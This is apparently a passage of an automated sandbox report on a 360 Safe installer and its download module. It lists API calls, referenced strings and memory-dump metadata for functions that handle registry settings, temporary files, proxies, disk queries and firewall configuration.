                                                                                                                                                                      • String ID: [%d.%3d] AsyncStartDownload from %I64d to %I64d HttpNum = %d $[%d.] $[%d.] ErrorCode =%d,$[%d.] ErrorCode =%d,StartDownload
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      • %s.%u, xrefs: 5F4D96CB
                                                                                                                                                                      • [%d.] RenameFile file(%s) already exist, xrefs: 5F4D96EE
                                                                                                                                                                      • [%d.] MoveFile fail, error code is %d, xrefs: 5F4D971C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$CountDeleteErrorLastMoveTick
                                                                                                                                                                      • String ID: %s.%u$[%d.] MoveFile fail, error code is %d$[%d.] RenameFile file(%s) already exist
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 001C867B
                                                                                                                                                                      • _memset.LIBCMT ref: 001C868C
                                                                                                                                                                      • GetVersionExW.KERNEL32(?,?,?,?,?,?,00000000), ref: 001C86A1
                                                                                                                                                                      • GetVersionExW.KERNEL32(?,?,?,?,?,?,00000000), ref: 001C86B2
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,00000000), ref: 001C86C2
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 001C86C9
                                                                                                                                                                      • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,00000000), ref: 001C86D7
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Version_memset$AddressHandleInfoModuleNativeProcSystem
                                                                                                                                                                      • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 001E3142
                                                                                                                                                                        • Part of subcall function 001E2050: _memset.LIBCMT ref: 001E2085
                                                                                                                                                                        • Part of subcall function 001E2050: _memset.LIBCMT ref: 001E212B
                                                                                                                                                                        • Part of subcall function 001E2050: _strncat.LIBCMT ref: 001E21AF
                                                                                                                                                                      • _memset.LIBCMT ref: 001E31C9
                                                                                                                                                                      • SHSetValueA.SHLWAPI ref: 001E31FA
                                                                                                                                                                      • SHSetValueA.SHLWAPI(80000002,Software\360Safe\Liveup,mid_old,00000001,?,?), ref: 001E3269
                                                                                                                                                                      • SHSetValueA.SHLWAPI(80000002,Software\360Safe\Liveup,mid,00000001,?,?), ref: 001E3298
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memset$Value$_strncat
                                                                                                                                                                      • String ID: Software\360Safe\Liveup$mid$mid_old
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 001CA71F
                                                                                                                                                                      • _memset.LIBCMT ref: 001CA72D
                                                                                                                                                                      • GetTempPathW.KERNEL32(00000400,?,?,00000000,000000CE,DLL,00000014,0017BCDE), ref: 001CA741
                                                                                                                                                                      • _memset.LIBCMT ref: 001CA754
                                                                                                                                                                        • Part of subcall function 001A12A8: _memset.LIBCMT ref: 001A12EC
                                                                                                                                                                        • Part of subcall function 001A12A8: CoCreateGuid.OLE32(?,?,?,00000800), ref: 001A12F8
                                                                                                                                                                        • Part of subcall function 001A12A8: _memset.LIBCMT ref: 001A1309
                                                                                                                                                                        • Part of subcall function 001A12A8: _wcsncpy.LIBCMT ref: 001A135F
                                                                                                                                                                      • PathCombineW.SHLWAPI(?,?,?), ref: 001CA784
                                                                                                                                                                      • _wcscat.LIBCMT ref: 001CA796
                                                                                                                                                                      • PathFileExistsW.SHLWAPI(?), ref: 001CA7A4
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memset$Path$CombineCreateExistsFileGuidTemp_wcscat_wcsncpy
                                                                                                                                                                      • String ID: .tmp
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 5F5204FB
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,00000000,?,00000001), ref: 5F520528
                                                                                                                                                                      • RegisterClassExW.USER32(00000030), ref: 5F52054C
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00000000,?,00000000,?,00000001), ref: 5F520554
                                                                                                                                                                      • CreateWindowExW.USER32(00000000,360AsyncHelper,360AsyncHelper,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000), ref: 5F520566
                                                                                                                                                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 5F520573
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: HandleModuleWindow$ClassCreateLongRegister_memset
                                                                                                                                                                      • String ID: 0$360AsyncHelper
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateMutexW.KERNEL32(00000000,00000001,Q360SafeInstallerMutex,Q360InstallerMainWnd,0024BCC8,?,0017BA36,Q360InstallerMainWnd,360Installer.exe,?), ref: 001CBD68
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 001CBD75
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 001CBD85
                                                                                                                                                                      • FindWindowW.USER32(Q360InstallerMainWnd,00000000), ref: 001CBD92
                                                                                                                                                                      • EnterCriticalSection.KERNEL32(0024BCE4,00000000), ref: 001CBDA7
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(0024BCE4,?), ref: 001CBDBA
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CriticalSection$CloseCreateEnterErrorFindHandleLastLeaveMutexWindow
                                                                                                                                                                      • String ID: Q360InstallerMainWnd$Q360SafeInstallerMutex
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetWindowLongW.USER32(?,000000EB), ref: 5F51FFAB
                                                                                                                                                                      • WSAGetLastError.WS2_32(4004667F,?), ref: 5F520063
                                                                                                                                                                      • WSAGetLastError.WS2_32(4004667F,?), ref: 5F52009F
                                                                                                                                                                      • DefWindowProcW.USER32(?,?,?,?), ref: 5F52028A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLastWindow$LongProc
                                                                                                                                                                      • String ID:
                                                                                                                                                                      APIs
                                                                                                                                                                      • WSAGetLastError.WS2_32(?,?,?,?,?), ref: 5F508E00
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 5F508E5B
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 5F508E63
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 5F508E6B
                                                                                                                                                                        • Part of subcall function 5F513F7C: _memset.LIBCMT ref: 5F513FAF
                                                                                                                                                                        • Part of subcall function 5F513F7C: wvnsprintfW.SHLWAPI(?,000003FF,?,?), ref: 5F513FCA
                                                                                                                                                                      Strings
                                                                                                                                                                      • [%d.%3d] OnClose_Receive Date tail_len = %d, xrefs: 5F508CA8
                                                                                                                                                                      • [%d.%3d] OnClose HttpBlock RangeFrom = %I64u BodyDownload = %I64u, xrefs: 5F508D69
                                                                                                                                                                      • [%d.%3d] %s(%s) closed, error code %d, api %d, state %d, downloaded %I64d, %d ms, xrefs: 5F508E1B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CountTick$ErrorLast_memsetwvnsprintf
                                                                                                                                                                      • String ID: [%d.%3d] OnClose HttpBlock RangeFrom = %I64u BodyDownload = %I64u$[%d.%3d] OnClose_Receive Date tail_len = %d$[%d.%3d] %s(%s) closed, error code %d, api %d, state %d, downloaded %I64d, %d ms
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00172750: _vswprintf_s.LIBCMT ref: 00172783
                                                                                                                                                                      • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,0024CDA4,?,?), ref: 001E2492
                                                                                                                                                                      • _memset.LIBCMT ref: 001E24BF
                                                                                                                                                                      • _strncpy.LIBCMT ref: 001E24FB
                                                                                                                                                                      • DeviceIoControl.KERNEL32 ref: 001E2531
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 001E259B
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseControlCreateDeviceFileHandle_memset_strncpy_vswprintf_s
                                                                                                                                                                      • String ID: SCSIDISK$\\.\Scsi%d:
                                                                                                                                                                      • API String ID: 170396225-2176293039
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 001D0896
                                                                                                                                                                        • Part of subcall function 001CA6F2: _memset.LIBCMT ref: 001CA71F
                                                                                                                                                                        • Part of subcall function 001CA6F2: _memset.LIBCMT ref: 001CA72D
                                                                                                                                                                        • Part of subcall function 001CA6F2: GetTempPathW.KERNEL32(00000400,?,?,00000000,000000CE,DLL,00000014,0017BCDE), ref: 001CA741
                                                                                                                                                                        • Part of subcall function 001CA6F2: _memset.LIBCMT ref: 001CA754
                                                                                                                                                                        • Part of subcall function 001CA6F2: PathCombineW.SHLWAPI(?,?,?), ref: 001CA784
                                                                                                                                                                        • Part of subcall function 001CA6F2: _wcscat.LIBCMT ref: 001CA796
                                                                                                                                                                        • Part of subcall function 001CA6F2: PathFileExistsW.SHLWAPI(?), ref: 001CA7A4
                                                                                                                                                                      • DeleteFileW.KERNEL32(?,00000010), ref: 001D0903
                                                                                                                                                                      • _memset.LIBCMT ref: 001D092F
                                                                                                                                                                      • GetTempPathW.KERNEL32(00000400,00000000,?,?,?), ref: 001D0940
                                                                                                                                                                        • Part of subcall function 001D0691: __EH_prolog3.LIBCMT ref: 001D06B0
                                                                                                                                                                        • Part of subcall function 001D0691: PathFileExistsW.SHLWAPI(?,00000010), ref: 001D06CC
                                                                                                                                                                        • Part of subcall function 001D0691: _memset.LIBCMT ref: 001D070A
                                                                                                                                                                        • Part of subcall function 001D0691: _memset.LIBCMT ref: 001D07B9
                                                                                                                                                                      • SHCreateDirectory.SHELL32(00000000,?,?,{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp,00000000,?,?,?), ref: 001D096E
                                                                                                                                                                        • Part of subcall function 001D0426: SetupIterateCabinetW.SETUPAPI(00000000,00000000,001D0376,00000000), ref: 001D0454
                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 001D09A7
                                                                                                                                                                      Strings
                                                                                                                                                                      • {A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp, xrefs: 001D0952
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memset$Path$File$DeleteExistsH_prolog3Temp$CabinetCombineCreateDirectoryIterateSetup_wcscat
                                                                                                                                                                      • String ID: {A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp
                                                                                                                                                                      • API String ID: 1438429394-342223665
                                                                                                                                                                      APIs
                                                                                                                                                                      • _malloc.LIBCMT ref: 5F4F2387
                                                                                                                                                                        • Part of subcall function 5F52856A: __FF_MSGBANNER.LIBCMT ref: 5F52858D
                                                                                                                                                                        • Part of subcall function 5F52856A: __NMSG_WRITE.LIBCMT ref: 5F528594
                                                                                                                                                                        • Part of subcall function 5F52856A: RtlAllocateHeap.NTDLL(00000000,-0000000D,00000001,00000000,00000000,?,5F532E8E,00000002,00000001,00000002,?,5F52F8B1,00000018,5F56C4F0,0000000C,5F52F942), ref: 5F5285E1
                                                                                                                                                                      • GetNetworkParams.IPHLPAPI(00000000,?), ref: 5F4F239D
                                                                                                                                                                      • _malloc.LIBCMT ref: 5F4F23B3
                                                                                                                                                                      • GetNetworkParams.IPHLPAPI(00000000,?), ref: 5F4F23C8
                                                                                                                                                                      • _memset.LIBCMT ref: 5F4F23EF
                                                                                                                                                                      • __snwprintf.LIBCMT ref: 5F4F2416
                                                                                                                                                                        • Part of subcall function 5F5289A5: __lock.LIBCMT ref: 5F5289C3
                                                                                                                                                                        • Part of subcall function 5F5289A5: ___sbh_find_block.LIBCMT ref: 5F5289CE
                                                                                                                                                                        • Part of subcall function 5F5289A5: ___sbh_free_block.LIBCMT ref: 5F5289DD
                                                                                                                                                                        • Part of subcall function 5F5289A5: HeapFree.KERNEL32(00000000,00000002,5F56C288,0000000C,5F52F908,00000000,5F56C4F0,0000000C,5F52F942,00000002,00000830,?,5F537C19,00000004,5F56C818,0000000C), ref: 5F528A0D
                                                                                                                                                                        • Part of subcall function 5F5289A5: GetLastError.KERNEL32(?,5F537C19,00000004,5F56C818,0000000C,5F532ED8,00000002,0000083F,00000000,00000000,00000000,?,5F52F137,00000001,00000214), ref: 5F528A1E
                                                                                                                                                                      Strings
                                                                                                                                                                      • http://wpad.%s/wpad.dat, xrefs: 5F4F240D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: HeapNetworkParams_malloc$AllocateErrorFreeLast___sbh_find_block___sbh_free_block__lock__snwprintf_memset
                                                                                                                                                                      • String ID: http://wpad.%s/wpad.dat
                                                                                                                                                                      • API String ID: 2241623331-1081111291
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 001A7216
                                                                                                                                                                      • SHGetValueW.SHLWAPI(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe,Path,?,?,?,?,?,0024CDA4), ref: 001A7239
                                                                                                                                                                      • PathCombineW.SHLWAPI(?,?,360safe.exe,?,?,?,0024CDA4), ref: 001A7269
                                                                                                                                                                      • PathFileExistsW.SHLWAPI(?,?,?,0024CDA4), ref: 001A7273
                                                                                                                                                                      Strings
                                                                                                                                                                      • SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe, xrefs: 001A722F
                                                                                                                                                                      • Path, xrefs: 001A722A
                                                                                                                                                                      • 360safe.exe, xrefs: 001A725D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Path$CombineExistsFileValue_memset
                                                                                                                                                                      • String ID: 360safe.exe$Path$SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe
                                                                                                                                                                      • API String ID: 1538502309-1025180333
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 5F4DA36C
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 5F4DA376
                                                                                                                                                                        • Part of subcall function 5F4EAE3C: KiUserExceptionDispatcher.NTDLL(406D1388,00000000,00000004,00001000,5F568AA8,00000018,5F51E73E,00000000), ref: 5F4EAE6F
                                                                                                                                                                        • Part of subcall function 5F4D802B: WaitForSingleObject.KERNEL32(?,000000FF), ref: 5F4D8033
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 5F4DA3A9
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 5F4DA3B3
                                                                                                                                                                        • Part of subcall function 5F4DA0F5: __EH_prolog3_GS.LIBCMT ref: 5F4DA0FC
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 5F4DA3C3
                                                                                                                                                                        • Part of subcall function 5F513FED: _memset.LIBCMT ref: 5F514020
                                                                                                                                                                        • Part of subcall function 5F513FED: wvnsprintfW.SHLWAPI(?,000003FF,?,00007148), ref: 5F51403B
                                                                                                                                                                      Strings
                                                                                                                                                                      • p2sp.Disk, xrefs: 5F4DA371
                                                                                                                                                                      • [DiskScheduler] type:%d, taskid:%d, cost:%dms, queue:%d., xrefs: 5F4DA3DC
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CountTick$CurrentDispatcherExceptionH_prolog3H_prolog3_ObjectSingleThreadUserWait_memsetwvnsprintf
                                                                                                                                                                      • String ID: [DiskScheduler] type:%d, taskid:%d, cost:%dms, queue:%d.$p2sp.Disk
                                                                                                                                                                      • API String ID: 1914228569-2306218905
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 001B63B9
                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 001B63D8
                                                                                                                                                                      • _memset.LIBCMT ref: 001B63F9
                                                                                                                                                                      • GetWindowTextW.USER32(?,00000000,000003FF), ref: 001B640D
                                                                                                                                                                      • IsWindowVisible.USER32(?), ref: 001B6434
                                                                                                                                                                      • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 001B6449
                                                                                                                                                                      • GetFocus.USER32 ref: 001B6488
                                                                                                                                                                      • SetFocus.USER32(?), ref: 001B64A2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FocusWindow$H_prolog3ItemMessageSendTextVisible_memset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1096848440-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 5F52ABF7
                                                                                                                                                                        • Part of subcall function 5F52EF97: TlsGetValue.KERNEL32(?,5F52F123,?,5F52E348,00000042,0000083F,00000002,00000000), ref: 5F52EFA0
                                                                                                                                                                        • Part of subcall function 5F52EF97: __decode_pointer.LIBCMT ref: 5F52EFB2
                                                                                                                                                                        • Part of subcall function 5F52EF97: TlsSetValue.KERNEL32(00000000,5F52E348,00000042,0000083F,00000002,00000000), ref: 5F52EFC1
                                                                                                                                                                      • ___fls_getvalue@4.LIBCMT ref: 5F52AC02
                                                                                                                                                                        • Part of subcall function 5F52EF77: TlsGetValue.KERNEL32(?,?,5F52AC07,00000000), ref: 5F52EF85
                                                                                                                                                                      • ___fls_setvalue@8.LIBCMT ref: 5F52AC15
                                                                                                                                                                        • Part of subcall function 5F52EFCB: __decode_pointer.LIBCMT ref: 5F52EFDC
                                                                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000000), ref: 5F52AC1E
                                                                                                                                                                      • ExitThread.KERNEL32 ref: 5F52AC25
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 5F52AC2B
                                                                                                                                                                      • __freefls@4.LIBCMT ref: 5F52AC4B
                                                                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 5F52AC5E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1925773019-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 001646A1
                                                                                                                                                                      • GetFileSizeEx.KERNEL32(?,?,00000000,?,00000003), ref: 001646B3
                                                                                                                                                                      • _malloc.LIBCMT ref: 001646E3
                                                                                                                                                                      • SetLastError.KERNEL32(00000008,?,?,?,00004000), ref: 001646F3
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorFileLastSize_malloc_memset
                                                                                                                                                                      • String ID: INIT$PE
                                                                                                                                                                      • API String ID: 942205088-3949469810
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Path$ExistsFileTemp_memset$ActiveCreateDirectoryH_prolog3Window
                                                                                                                                                                      • String ID: D!$http://360.cn$parent=
                                                                                                                                                                      • API String ID: 2807940103-317923980
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 00179965
                                                                                                                                                                        • Part of subcall function 001774B2: CLSIDFromProgID.COMBASE(?,?), ref: 001774D1
                                                                                                                                                                        • Part of subcall function 001774B2: CoCreateInstance.OLE32(?,?,?,0021E8A0), ref: 001774E9
                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 00179A94
                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 00179B14
                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 00179BB9
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FreeString$CreateFromH_prolog3_catchInstanceProg
                                                                                                                                                                      • String ID: HNetCfg.FwAuthorizedApplication$HNetCfg.FwMgr
                                                                                                                                                                      • API String ID: 3810993049-1951265404
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 5F4F5D5B
                                                                                                                                                                        • Part of subcall function 5F516BE8: RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,?,?,5F4F5BD5,customproxytype,?,FF4173A1), ref: 5F516C13
                                                                                                                                                                        • Part of subcall function 5F516CC7: RegSetValueExW.KERNEL32(?,00000000,00000000,00000004,?,00000004,?,5F4F5B99,proxytype,00000001,proxytype,?,FF4173A1), ref: 5F516CEB
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Value$CountQueryTick
                                                                                                                                                                      • String ID: customhttp$customproxytype$customsocks$ieproxy$proxytype
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 0017D0A2
                                                                                                                                                                        • Part of subcall function 0017CE6B: __EH_prolog3_GS.LIBCMT ref: 0017CE75
                                                                                                                                                                        • Part of subcall function 0017CE6B: _memset.LIBCMT ref: 0017CEE2
                                                                                                                                                                        • Part of subcall function 0017CE6B: GetLongPathNameW.KERNEL32(00000000,?,00000104), ref: 0017CEF9
                                                                                                                                                                        • Part of subcall function 0017CFE7: __EH_prolog3.LIBCMT ref: 0017CFEE
                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,00000018,0022CC68,00000000,00000018,themes,00000018,0017BEB5,00000000), ref: 0017D0F2
                                                                                                                                                                        • Part of subcall function 001C4C7D: GetModuleHandleW.KERNEL32(sites.dll,0017D12D,0021F258,000000FF,00000000,00000000), ref: 001C4C8B
                                                                                                                                                                      • PathFileExistsW.SHLWAPI(00000000,00000000,?,00000000,?), ref: 0017D1AF
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Path$CurrentDirectoryExistsFileH_prolog3H_prolog3_H_prolog3_catchHandleLongModuleName_memset
                                                                                                                                                                      • String ID: \NewInstallAir\NewInstallAir.ui$\theme_NewInstallAir.xml$themes
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00198CA6
                                                                                                                                                                        • Part of subcall function 001A72A6: __EH_prolog3.LIBCMT ref: 001A72C5
                                                                                                                                                                        • Part of subcall function 001A72A6: _memset.LIBCMT ref: 001A72EC
                                                                                                                                                                        • Part of subcall function 001A73D5: __EH_prolog3.LIBCMT ref: 001A73F4
                                                                                                                                                                        • Part of subcall function 001A73D5: _memset.LIBCMT ref: 001A7422
                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,00003001), ref: 00198E38
                                                                                                                                                                        • Part of subcall function 0017AFB8: __EH_prolog3.LIBCMT ref: 0017AFBF
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: H_prolog3$_memset$ExchangeInterlocked
                                                                                                                                                                      • String ID: .dir$360Installer$\Setup.ini$\custom_wnd.ini
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 001E2FCC
                                                                                                                                                                      • SHGetValueA.SHLWAPI(80000002,Software\360Safe\Liveup,mid,?,?,?,?,00000400), ref: 001E2FF5
                                                                                                                                                                      • _memset.LIBCMT ref: 001E30A2
                                                                                                                                                                      • lstrcmpiA.KERNEL32(?,?), ref: 001E30CA
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memset$Valuelstrcmpi
                                                                                                                                                                      • String ID: Software\360Safe\Liveup$mid
                                                                                                                                                                      APIs
                                                                                                                                                                      • WSASetLastError.WS2_32(0000276D,?,?,?,?,?,?,?), ref: 5F520772
                                                                                                                                                                      • socket.WS2_32(00000002,?,00000000), ref: 5F5207B5
                                                                                                                                                                      • WSAGetLastError.WS2_32(?,?,?,?,?,?,?), ref: 5F5207C0
                                                                                                                                                                        • Part of subcall function 5F5204A4: WSAAsyncSelect.WS2_32(?,00000000,?,?), ref: 5F5204C4
                                                                                                                                                                      • WSAGetLastError.WS2_32(?,00000010,?,00000000,?,?,?,?,?,?,?), ref: 5F5207E4
